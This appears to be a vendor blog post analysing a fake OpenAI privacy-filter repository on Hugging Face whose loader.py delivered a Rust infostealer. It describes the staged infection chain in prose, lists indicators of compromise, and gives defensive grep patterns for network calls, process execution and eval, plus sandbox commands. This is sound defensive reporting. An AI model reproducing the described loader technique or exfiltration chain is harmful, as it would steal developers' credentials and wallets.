What is the fake OpenAI Privacy Filter attack?

In early May 2026, attackers uploaded a repository named Open-OSS/privacy-filter to Hugging Face that impersonated OpenAI's legitimate openai/privacy-filter model. It copied the official model card verbatim and shipped a loader.py that downloaded a Rust-based information stealer on Windows. The repo hit #1 trending in 18 hours with roughly 244,000 downloads (the count was likely inflated) before HiddenLayer Research disclosed it and Hugging Face took it down.

Is Hugging Face safe to use after this attack?

Hugging Face itself was not compromised. The platform hosts user-uploaded models the same way GitHub hosts user-uploaded code, and the attack relied on a typosquatted org name plus a copy-pasted model card. Hugging Face is safe to use if you treat every model you load as untrusted code: verify the org, check the upload date, audit any custom loader.py, and avoid trust_remote_code=True on repos you have not vetted.

How do I verify a Hugging Face model is legitimate?

Confirm the org name character-by-character against the vendor's official site (openai/ not Open-OSS/, meta-llama/ not meta_llama/). Check that the upload date matches the public announcement. Inspect any loader.py, modeling_*.py, or configuration_*.py for outbound HTTP, subprocess, or eval calls. Run huggingface-cli scan and pin a specific commit SHA with the revision parameter in from_pretrained instead of a branch name.

What is trust_remote_code and why is it dangerous?

trust_remote_code=True is a Hugging Face transformers flag that lets a downloaded model execute Python code defined inside the repo at load time. It exists because some legitimate models ship custom layers. The danger is that the same mechanism lets a malicious uploader run arbitrary code on your machine the moment you call from_pretrained. Default it to False and only enable for repos from vendors you have independently verified.

Who is Silver Fox and what is ValleyRAT?

Silver Fox is a Chinese-language threat actor best known for distributing the WinOS 4.0 remote access trojan (also tracked as ValleyRAT). HiddenLayer's report does not name Silver Fox directly; it links the fake-model campaign to a parallel WinOS 4.0 npm typosquat through the shared C2 domain welovechinatown[.]info, citing Panther's prior research. Subsequent reporting from The Hacker News and others attributed the broader activity to Silver Fox and named a related npm package called trevlo with roughly 2,300 downloads.

Fake OpenAI Privacy Filter Hits Hugging Face

In early May 2026, a malicious repository named Open-OSS/privacy-filter appeared on Hugging Face. It impersonated OpenAI's legitimate org and copied the official model card verbatim. Within 18 hours it was the #1 trending model on the platform with roughly 244,000 downloads. Behind the scenes, a loader.py was downloading a Rust-based information stealer onto every Windows machine that ran it.

The attack was discovered by HiddenLayer Research, which linked it to the WinOS 4.0 implant via prior Panther research on a parallel npm typosquat. Subsequent coverage from The Hacker News attributed the activity to Silver Fox, a Chinese threat actor associated with the ValleyRAT malware family. This guide covers what happened, how the multi-stage payload worked, and the seven verification steps every AI developer should run before calling from_pretrained on anything new.

Information current as of May 11, 2026. HiddenLayer Research, npm and Hugging Face security teams, and downstream reporters are still investigating. This post will be updated periodically as new IOCs, technical analysis, or attribution evidence is published.

What Happened

OpenAI published a small open-source utility model called openai/privacy-filter in April 2026. It is the kind of release that gets a few thousand downloads from researchers and red-teamers and then quietly accumulates a slow tail of traffic. Attackers noticed the same thing the rest of us did, which is that anything with “OpenAI” in the name pulls disproportionate attention on Hugging Face.

A few weeks later they uploaded Open-OSS/privacy-filter from a brand-new account. The repo cloned OpenAI's model card verbatim. The only differences were a fake loader.py and a configuration that called it on load. According to BleepingComputer's coverage of the HiddenLayer findings, the model reached the top of Hugging Face's trending list inside 18 hours with around 244,000 downloads and 667 likes. Both numbers were likely inflated by bots, but the trending placement made the repo visible to legitimate developers searching for the real release.

The campaign was not a single repo. HiddenLayer documented a cluster of six sibling uploads from an account named anthfu (all uploaded April 24, 2026) that targeted other high-attention namespaces: Bonsai-8B-gguf, DeepSeek-V4-Pro, Qwopus-GLM-18B-Merged-GGUF, and others. All used the same loader pattern. A related npm package called trevlo, first flagged by Panther in April 2026, delivered the same WinOS 4.0 implant through the operator's parallel npm infrastructure.

Hugging Face disabled the repos shortly after disclosure. The npm package is gone. But for every researcher and developer who loaded the fake model during the 18-hour window, the stealer ran with their user privileges and shipped browser sessions, Discord tokens, wallet seed phrases, and FileZilla credentials out the door before anyone knew anything was wrong.

Incident Timeline

Apr 2026

OpenAI publishes the legitimate openai/privacy-filter model on Hugging Face

Early May 2026

Attackers create Open-OSS/privacy-filter, copying OpenAI's model card verbatim

~18 hours later

The fake repo hits #1 trending on Hugging Face with ~244,000 downloads and 667 likes

May 7, 2026

HiddenLayer Research identifies the malicious loader.py and infostealer payload

Shortly after disclosure

Hugging Face disables Open-OSS/privacy-filter and the related anthfu/* sibling repos

Anatomy of the Attack

The fake model worked because Hugging Face is, by design, a code-distribution platform that happens to host tensors. Any repo can ship a loader.py that runs when you call from_pretrained. The five-stage chain that follows is reconstructed from HiddenLayer's technical writeup, and it is the same shape as a typical npm post-install attack, just adapted to the ML toolchain.

Stage 1: loader.py bait

Shipped inside the model repo. When a user calls from_pretrained on the fake model, loader.py executes and disables SSL verification before fetching the next stage.

Stage 2: Dead-drop resolver

The loader queries JSON Keeper as a resolver to fetch the live payload URL, letting the operators swap delivery infrastructure without redeploying the model.

Stage 3: PowerShell + batch

A PowerShell command pulls a batch script from api.eth-fastscan[.]org. The script prompts UAC and adds Microsoft Defender exclusions to its working directory.

Stage 4: Rust infostealer

A 1.07 MB Rust-based stealer (SHA-256 ba67720d...) harvests Chromium and Gecko browser data, Discord local storage, FileZilla configs, crypto wallets, seed phrases, and screenshots.

Stage 5: Exfiltration

Harvested data is serialized to JSON and exfiltrated to recargapopular[.]com. Telemetry beacons go to welovechinatown[.]info as the C2.

Why the multi-stage design matters

The loader inside the repo is small, boring, and easy to miss in code review. The interesting payload lives at api.eth-fastscan[.]org, behind a JSON Keeper redirect that the operators can swap at will. Even if Hugging Face had scanned the static repo contents, the malicious bits were never in the artefact. They were one HTTP request away.

Why the AI Model Supply Chain Is Different from npm

If you have read our coverage of the Axios npm supply chain attack or the Claude Code source map leak, the loader.py pattern looks familiar. It is essentially the npm post-install hook reinvented for the ML world. What makes the AI model supply chain a richer target is not the technique. It is the missing scaffolding.

npm has lockfiles, signed registry tarballs, npm audit, Socket.dev, Snyk, and a decade of muscle memory around .npmrc hardening. Hugging Face has tags, model cards, and a community trust signal in the form of likes and downloads. There is no widely adopted lockfile equivalent for model weights. There is no industry-standard signing mechanism for tensor files. The cultural default is trust_remote_code=True because some legitimate models genuinely need it.

That gap is where Silver Fox lived. Trending placement substituted for reputation. A copy-pasted model card substituted for code review. The 244,000 download number, inflated or not, substituted for a signed manifest. None of this is Hugging Face's fault any more than the Axios incident was npm's fault. It is the ecosystem maturing under attack.

How to Verify AI Models Before You Load Them

None of the following checks is sufficient on its own. Layered together, every one of them would have caught the fake privacy filter inside 60 seconds. If you maintain an MLOps pipeline that pulls models from Hugging Face, codify these as CI steps instead of relying on the person running from_pretrained to remember them.

1Verify the org name against the vendor's official channel

The single most effective check. Open the vendor's official site (openai.com, ai.meta.com, mistral.ai) and copy the org slug from there. Do not trust a Hugging Face search result, do not trust the first Google hit, and do not trust a tweet. Typosquats like Open-OSS vs openai look obvious in hindsight and invisible when you are in flow.

# Always confirm the publisher org against the vendor's official channel.
# OpenAI's real repo is openai/. Look-alikes use Open-OSS/, openai-team/, etc.

# Wrong:   Open-OSS/privacy-filter      <- typosquat
# Right:   openai/privacy-filter        <- the real one

# Anchor on the announcement URL, not on a Hugging Face search result.
# https://openai.com/index/<announcement-slug>
# https://github.com/openai/<repo>

2Check the upload date against the announcement

Real vendor releases ship on the same day as the announcement, not weeks later. A model card that quotes a blog post from a month ago but was uploaded yesterday is a red flag. Sort the org's repos by date and confirm the new release is not a recent solo upload from a fresh account.

3Audit any custom loader, config, or modeling file

Tensor files are inert. Python files are not. Open every loader.py, modeling_*.py, and configuration_*.py in the repo before you load anything. Five greps cover most of what an attacker would do.

# Before loading, eyeball every Python file shipped with the repo.
# These are the red-flag patterns.

# 1. Outbound network calls during load
grep -RInE "requests\.(get|post)|urllib\.|httpx\.|aiohttp\." .

# 2. Process execution
grep -RInE "subprocess|os\.system|os\.popen|pty\.spawn" .

# 3. Dynamic code execution
grep -RInE "exec\(|eval\(|compile\(" .

# 4. SSL verification disabled (the fake privacy filter did this)
grep -RInE "verify=False|InsecureRequestWarning" .

# 5. Pickle deserialization on attacker-controlled bytes
grep -RInE "pickle\.loads?|torch\.load.*weights_only=False" .

4Default `trust_remote_code` to `False`

This flag is the single biggest force multiplier on a Hugging Face supply chain attack. With it set to True, calling from_pretrained on a malicious repo runs arbitrary code with your user permissions. Treat it the way you treat eval: never on by default, never on without a code review, never on without isolation. The official Hugging Face docs on custom models explain why the flag exists (loading architectures not built into transformers) and recommend pinning a revision whenever you do enable it.

5Pin a commit SHA with `revision=`

Branch names like main move. The bytes you reviewed today are not guaranteed to be the bytes you load next week. Pin the exact SHA you audited via the revision parameter. This is the Hugging Face equivalent of a lockfile entry.

from transformers import AutoModel, AutoTokenizer

# DANGEROUS: loads HEAD of main, can change underneath you
model = AutoModel.from_pretrained(
    "vendor/model-name",
    trust_remote_code=False,       # default this to False
)

# SAFER: pin a specific commit SHA you audited
model = AutoModel.from_pretrained(
    "vendor/model-name",
    revision="3f9c2a1b4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f90",  # the SHA you reviewed
    trust_remote_code=False,
)

6Run the first load inside a network-isolated sandbox

Even after the static review, run the first from_pretrained inside a container with --network none. If the loader tries to call out, you see the error instead of a stealer. If the load succeeds without complaint, the repo is at least not phoning home on import.

# Load once in an isolated container with no outbound network.
# If anything tries to phone home, you'll see it (and survive it).

docker run --rm -it \
  --network none \
  --read-only \
  --tmpfs /tmp:rw,size=2g \
  -v "$PWD/audit:/audit:ro" \
  python:3.12-slim \
  bash -c "pip install --no-deps transformers torch && \
           python -c 'from transformers import AutoModel; \
                      AutoModel.from_pretrained(\"/audit/model\", \
                      trust_remote_code=False)'"

7Subscribe to advisories that actually cover the AI stack

The traditional npm advisory feeds do not catch Hugging Face campaigns. Follow HiddenLayer Research, Socket.dev, and Hugging Face's own security disclosures. Set a 30-minute weekly slot to skim these in the same way ops teams skim CVE feeds. The fake privacy filter was disclosed publicly more than 24 hours before most teams found out internally.

The core principle: treat models as code

A Hugging Face repo is not a tensor file you download. It is a Python package that happens to ship weights. The same hygiene you apply to npm install on an unfamiliar package, you owe to from_pretrained on an unfamiliar model.

Attribution: Silver Fox and ValleyRAT

HiddenLayer's research connects the fake-model campaign to the WinOS 4.0 implant (also tracked as ValleyRAT) by linking its C2 domain welovechinatown[.]info to a parallel npm typosquat campaign documented by Panther in April 2026. Subsequent reporting from The Hacker News attributed the broader activity to Silver Fox, a Chinese-language threat actor best known for distributing WinOS 4.0 through phishing lures and trojanised installers aimed at Mandarin-speaking users.

Two things make this campaign notable as an evolution of the actor's tradecraft. First, the targeting shifted from regional phishing to the global developer audience that browses Hugging Face. Second, the operators ran a parallel npm push: a package called trevlo that delivered the same implant. Panther observed 866 downloads in their April 6 snapshot; CSO Online later reported the count had grown to roughly 2,300. HiddenLayer connects the two campaigns through the shared C2 domain welovechinatown[.]info.

The pattern matters because it confirms what defenders have suspected for a year: AI model registries and language package registries are now part of the same threat surface. The same operators are running both plays. The same defensive muscle you have built for one ecosystem applies to the other.

Indicators of Compromise

Source: HiddenLayer Research. Add these to your DNS sinkhole, EDR allowlists, and pip/Hugging Face audit rules.

Malicious repos (now disabled)

Open-OSS/privacy-filter
anthfu/Bonsai-8B-gguf
anthfu/Qwen3.6-35B-A3B-APEX-GGUF
anthfu/DeepSeek-V4-Pro
anthfu/Qwopus-GLM-18B-Merged-GGUF
anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
anthfu/supergemma4-26b-uncensored-gguf-v2
npm: trevlo

Network IOCs

api.eth-fastscan[.]org
welovechinatown[.]info
recargapopular[.]com
jsonkeeper[.]com/b/AVNNE

SHA-256 file hashes

loader.py (Open-OSS/privacy-filter)

6db01158b044f178c45754666e2cbc0365f394e953fbf99ec34aa5304d5b79b1

loader.py (anthfu/* repos)

6d5b1b7b9b95f2074094632e3962dc21432c2b7dccfbbe2c7d61f724ffcfea7c

start.bat

4fba92a34fd9338293de53444bc9f05c278897d903a24efb95fde0522b3d50c0

update.bat (downloader)

04f0569971ac7ff81c8656e8453a69189d8870040044909dad45c04c567e7564

Rust infostealer (1.07 MB)

ba67720dd115293ec5a12d08be6b0ee982227a4c5e4662fb89269c76556df6e0

Payload hosted by api.eth-fastscan[.]org

c1b59cc25bdc1fe3f3ce8eda06d002dda7cb02dea8c29877b68d04cd089363c7

Frequently Asked Questions

Build Secure AI-Powered Workflows

TurboDocx helps engineering teams ship document automation with audited, enterprise-grade infrastructure. API-first, built by developers who treat every integration as untrusted by default.

Schedule a Demo Explore the API

Alex Martinez•Developer Relations & Automation Lead

Fake OpenAI Privacy Filter on Hugging Face: What Happened and How to Verify AI Models

What Happened

Incident Timeline

Anatomy of the Attack

Stage 1: loader.py bait

Stage 2: Dead-drop resolver

Stage 3: PowerShell + batch

Stage 4: Rust infostealer

Stage 5: Exfiltration

Why the AI Model Supply Chain Is Different from npm

How to Verify AI Models Before You Load Them

1Verify the org name against the vendor's official channel

2Check the upload date against the announcement

3Audit any custom loader, config, or modeling file

4Default `trust_remote_code` to `False`

5Pin a commit SHA with `revision=`

6Run the first load inside a network-isolated sandbox

7Subscribe to advisories that actually cover the AI stack

Attribution: Silver Fox and ValleyRAT

Indicators of Compromise

Malicious repos (now disabled)

Network IOCs

SHA-256 file hashes

Frequently Asked Questions

What is the fake OpenAI Privacy Filter attack?

Is Hugging Face safe to use after this attack?

How do I verify a Hugging Face model is legitimate?

What is trust_remote_code and why is it dangerous?

Who is Silver Fox and what is ValleyRAT?

Related Resources

The Claude Code Source Map Leak

The Axios npm Supply Chain Attack

Cursor vs Claude Code vs OpenCode

Best Claude Code Plugins, Skills & MCP Servers

Build Secure AI-Powered Workflows

Fake OpenAI Privacy Filter on Hugging Face: What Happened and How to Verify AI Models

What Happened

Incident Timeline

Anatomy of the Attack

Stage 1: loader.py bait

Stage 2: Dead-drop resolver

Stage 3: PowerShell + batch

Stage 4: Rust infostealer

Stage 5: Exfiltration

Why the AI Model Supply Chain Is Different from npm

How to Verify AI Models Before You Load Them

1Verify the org name against the vendor's official channel

2Check the upload date against the announcement

3Audit any custom loader, config, or modeling file

4Default trust_remote_code to False

5Pin a commit SHA with revision=

6Run the first load inside a network-isolated sandbox

7Subscribe to advisories that actually cover the AI stack

Attribution: Silver Fox and ValleyRAT

Indicators of Compromise

Malicious repos (now disabled)

Network IOCs

SHA-256 file hashes

Frequently Asked Questions

What is the fake OpenAI Privacy Filter attack?

Is Hugging Face safe to use after this attack?

How do I verify a Hugging Face model is legitimate?

What is trust_remote_code and why is it dangerous?

Who is Silver Fox and what is ValleyRAT?

Related Resources

The Claude Code Source Map Leak

The Axios npm Supply Chain Attack

Cursor vs Claude Code vs OpenCode

Best Claude Code Plugins, Skills & MCP Servers

Build Secure AI-Powered Workflows

4Default `trust_remote_code` to `False`

5Pin a commit SHA with `revision=`